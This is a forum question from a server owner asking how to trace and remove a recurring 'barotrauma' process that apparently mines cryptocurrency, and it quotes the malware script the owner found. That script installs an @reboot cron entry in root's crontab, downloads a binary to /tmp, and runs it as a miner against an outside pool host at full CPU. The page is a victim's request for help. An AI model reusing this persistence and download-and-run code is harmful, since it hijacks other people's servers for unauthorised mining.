BAROTRAUMA digger on Ubuntu server

Hi i got problem on my Ubuntu server. Every couple weeks i got running process called "barotrauma" from jvmapps user and it's consumes 100% CPU. It's probably some kind of crypto digger. How can I track what is that and remove it from my server ?? Many thanks for help.

I found this script:

#!/bin/bash
if cat /proc/net/tcp | grep -q "CB35F725:01BB 01"
then echo barotrauma already installed and running
else if [ "$(whoami)" == "root" ]; then echo '@reboot ( curl --output /tmp/barotrauma && chmod 777 /tmp/barotrauma && /tmp/barotrauma -a rx/0 -o www2.evandroamaral.com:443 --max-cpu-usage 100 --cpu-priority 4 --tls )' >> /var/spool/cron/crontabs/root curl --output /tmp/barotrauma; chmod 777 /tmp/barotrauma; /tmp/barotrauma -a rx/0 -o www2.evandroamaral.com:443 --max-cpu-usage 100 --cpu-priority 4 --tls -B else curl --output /tmp/barotrauma; chmod 777 /tmp/barotrauma; /tmp/barotrauma -a rx/0 -o www2.evandroamaral.com:443 --max-cpu-usage 100 --cpu-priority 4 --tls -B

I deleted it but every couple weeks barotrauma is back.

5 Sorted by: Reset to default

Know someone who can answer? Share a link to this question via email, Twitter, or Facebook.

Your Answer

Sign up or log in

Sign up using Google Sign up using Facebook Sign up using Email and Password Submit

Post as a guest

Post Your Answer Discard

By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy